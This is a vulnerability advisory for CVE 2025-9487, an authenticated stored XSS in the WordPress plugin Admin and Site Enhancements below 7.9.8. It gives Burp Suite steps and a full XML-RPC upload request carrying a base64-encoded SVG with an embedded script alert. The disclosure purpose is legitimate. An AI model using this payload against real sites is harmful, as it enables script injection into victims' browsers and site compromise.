Admin and Site Enhancements < 7.9.8 – Authenticated Stored XSS via SVG | CVE 2025-9487

Description

The plugin does not sanitise SVG files when uploaded via xmlrpc.php when such uploads are enabled, which could allow users to upload a malicious SVG containing XSS payloads

Proof of Concept

The "SVG Upload" settings needs to be enabled (/wp-admin/tools.php?page=admin-site-enhancements#content-management), and select a role to allow them to upload such file.

1. Access to [example.com/xmlrpc.php] and capture the request by Burp Suite.
2. Go to Burp Suite, send this request to [Repeater]
3. Change the method of this request to [POST] and paste the payload as below to body of request.
4. Send the request.
5. Response return status code 200, upload successfully
6. Go to the URL of SVG file: 
https://example.com/wp-content/uploads/2025/08/svgTrigger.svg

Payload:

```
<?xml version="1.0"?>
<methodCall>
  <methodName>wp.uploadFile</methodName>
  <params>
    <param>
      <value><int>1</int></value> <!-- blog_id -->
    </param>
    <param>
      <value><string>username</string></value> <!-- username -->
    </param>
    <param>
      <value><string>password</string></value> <!-- password -->
    </param>
    <param>
      <value>
        <struct>
          <member>
            <name>name</name>
            <value><string>svgTrigger.svg</string></value>
          </member>
          <member>
            <name>type</name>
            <value><string>image/svg+xml</string></value>
          </member>
          <member>
            <name>bits</name>
            <value><base64>
PHN2ZyB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciIHdpZHRoPSI0MDAiIGhlaWdodD0iNDAwIiB2aWV3Qm94PSIwIDAgMTI0IDEyNCIgZmlsbD0ibm9uZSI+DQo8cmVjdCB3aWR0aD0iMTI0IiBoZWlnaHQ9IjEyNCIgcng9IjI0IiBmaWxsPSIjMDAwMDAwIi8+DQogICA8c2NyaXB0IHR5cGU9InRleHQvamF2YXNjcmlwdCI+ICANCiAgICAgIGFsZXJ0KCJ0cmlnZ2VyIik7DQogICA8L3NjcmlwdD4NCjwvc3ZnPg==
            </base64></value>
          </member>
          <member>
            <name>overwrite</name>
            <value><boolean>0</boolean></value>
          </member>
        </struct>
      </value>
    </param>
  </params>
</methodCall>
```